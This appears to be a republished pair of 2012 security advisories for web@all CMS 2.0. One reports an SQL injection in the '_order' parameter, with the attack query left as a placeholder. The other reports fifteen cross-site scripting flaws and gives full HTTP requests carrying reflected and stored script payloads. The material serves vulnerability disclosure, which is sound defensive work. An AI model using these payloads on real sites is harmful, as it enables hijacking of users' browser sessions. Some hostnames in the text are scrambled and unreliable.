web@all CMS 2.0 (_order) SQL Injection Vulnerability 开发者: web@all 程序官网: http://HdhCmsTestwebatall.org 影响版本: 2.0 Summary: web@all is a PHP content management system (CMS). If you know about it,you nearly can use it to do anything. Desc: The application suffers from an SQL Injection vulnerability. Input passed via the GET parameter '_order' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5099 Advisory URL: http://HdhCmsTestzeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php 21.08.2012 --- http:// HdhCmsTest2cto测试数据 /webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article ============================================================================= web@all CMS 2.0 Multiple Remote XSS Vulnerabilities Vendor: web@all Product web page: http://HdhCmsTestwebatall.org Affected version: 2.0 Summary: web@all is a PHP content management system (CMS). If you know about it,you nearly can use it to do anything. Desc: web@all CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ---------------------------------------------------------------------------- * Parameter * * Method * * Module * * Type * ---------------------------------------------------------------------------- 1. act POST member Reflected 2. security POST member Reflected 3. username POST member Reflected 4. id GET article Reflected 5. mod GET/POST member Reflected 6. _flag GET article Reflected 7. _text[] GET article Reflected 8. _text[alias] GET article Reflected 9. _text[category] GET article Reflected 10. _text[email] GET member Reflected 11. _text[title] GET article Reflected 12. _text[username] GET article Reflected 13. _text[timeadd] GET member Reflected 14. title POST article/cron Stored 15. description POST cron Stored ---------------------------------------------------------------------------- Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5098 Advisory URL: http://HdhCmsTestzeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php 21.08.2012 --- Reflected: ---------- POST /webatall/sys/action.php HTTP/1.1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username POST /webatall/sys/action.php HTTP/1.1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username POST /webatall/sys/action.php HTTP/1.1 Content-Length: 159 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username POST /webatall/sys/action.php HTTP/1.1 Content-Length: 147 Content-Type: application/x-www-form-urlencoded Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmou seo ver%3dprompt%28940245%29%20bad%3d%22&mod=article GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member Stored: ------- POST http:// HdhCmsTest2cto测试数据 /webatall/sys/action.php HTTP/1.1 act sys_add author test category_id 1 content test content_key test copyright test files id lang menu meta_description test meta_keywords test mod article options test status 1 thumbs test title "><script>alert(1);</script> POST http://localhost/webatall/sys/action.php HTTP/1.1 act sys_add cron delete_unpaid_transaction.php description "><script>alert(2);</script> id menu mod cron run_interval status 1 title "><script>alert(3);</script>
查看更多关于web@all CMS 2.0多个缺陷及修复 - 网站安全 - 自学p的详细内容...